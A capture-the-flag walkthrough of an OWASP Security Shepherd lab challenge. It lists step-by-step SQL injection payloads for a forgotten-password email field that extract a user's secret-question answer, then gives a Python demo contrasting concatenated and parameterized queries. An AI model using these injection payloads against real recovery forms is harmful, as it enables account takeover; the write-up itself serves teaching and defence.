OWASP Security Shepherd Project - Session Management Challenge 6 (Session Management Challenge)
Challenge
Solution
First, try admin / admin -> There is no user named admin!
Try root / root ->
User root exists! His/Her email address is elitehacker@shepherd.com.
Click the "Have you forgotten your password?" link and input the root user's email ->
We don't know the Security Question answers...
Input an apostrophe (') or a double quote (") to see whether there is a SQLi ->
There is a SQLi in the email address field when using a double quote (")!
Input " UNION Select database();# -> BrokenAuthAndSessMangChalSix
Input " UNION Select table_name FROM information_schema.tables WHERE table_schema = "BrokenAuthAndSessMangChalSix -> Invalid Data Submitted: Invalid Email Address!
We notice that if the input is too long, there will be an Invalid Data warning: the length check is the only validation that stops us.
Input " UNION Select username from secret;# -> com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: SELECT command denied to user 'randomMoFoName'@'localhost' for table 'secret'
There is a secret table, but the application's database user has no right to read it!
Input " UNION Select username from users;# -> manager
There is a table "users" with a column "username", and its first row is "manager"!
Input " UNION Select username from users WHERE username="root";# -> root
Input " UNION Select password from users WHERE username="root";# -> com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Unknown column 'password' in 'field list'
There is no 'password' column in the 'users' table.
Input " UNION Select secretanswer from users WHERE username="root";# -> Deerburn Hotel
We get the answer to the secret question of user root!
Use it in the forgotten-password feature ->
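The root cause of this challenge is that the email address is concatenated into the SQL text, and the only filter is a length limit. The following is an added example, not code from Security Shepherd or from this write-up, that rebuilds the situation in an in-memory SQLite database: the vulnerable lookup beside a parameterized one, the length-only check the walkthrough observes beside a proper format check. Table and column names (users, username, email, secretanswer) are the ones found above; the rows, the answer values, the email addresses and the length limit of 100 are assumptions. The UNION payload is the same idea as the last step above, rewritten in SQLite syntax (single quotes and a -- comment instead of MySQL's " and #).

```python
import re
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the challenge database. The table and
    # column names come from the walkthrough; the rows and values are made up.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, email TEXT, secretanswer TEXT);
        INSERT INTO users VALUES ('manager', 'manager@example.test', 'first-answer');
        INSERT INTO users VALUES ('root', 'root@example.test', 'second-answer');
        """
    )
    return conn


# Same UNION idea as the last payload in the write-up, in SQLite syntax.
PAYLOAD = "' UNION SELECT secretanswer FROM users WHERE username='root'--"


def lookup_vulnerable(conn, email):
    # Vulnerable pattern: the email is pasted into the SQL text, so the database
    # cannot distinguish the user's data from the query structure.
    sql = "SELECT username FROM users WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, email):
    # Hardened pattern: the value is bound separately from the SQL text and is
    # always treated as data, never as part of the query.
    sql = "SELECT username FROM users WHERE email = ?"
    return [row[0] for row in conn.execute(sql, (email,))]


# The only check the walkthrough observes is a length limit. The limit (100)
# is an assumption, not the challenge's real value.
MAX_EMAIL_LEN = 100


def passes_length_check(email):
    return len(email) <= MAX_EMAIL_LEN


# A syntactic format check: an email address never contains quotes, spaces or
# SQL keywords, so it rejects the payload before any SQL is built.
EMAIL_RE = re.compile(
    r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}"
)


def is_valid_email(email):
    return EMAIL_RE.fullmatch(email) is not None


def forgot_password_lookup(conn, email):
    # Defence in depth: reject malformed input, then still bind the parameter.
    if not is_valid_email(email):
        raise ValueError("Invalid Data Submitted: Invalid Email Address!")
    return lookup_parameterized(conn, email)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", lookup_vulnerable(db, PAYLOAD))     # leaks the secret answer
    print("parameterized:", lookup_parameterized(db, PAYLOAD))  # []: payload is just data
    print("length check :", passes_length_check(PAYLOAD))       # True: the weak check passes it
    print("format check :", is_valid_email(PAYLOAD))            # False: rejected before SQL
```

Run the file directly to see the four lines. The length check alone is why the walkthrough succeeds: the short payloads fit under the limit, only the long information_schema query is rejected. Binding the parameter fixes the injection on its own; the format check is an additional layer and also produces the same "Invalid Email Address" style message for genuinely malformed input. The separate 'secret' table permission error seen above is a third layer (least privilege for the database account) that the challenge already gets right.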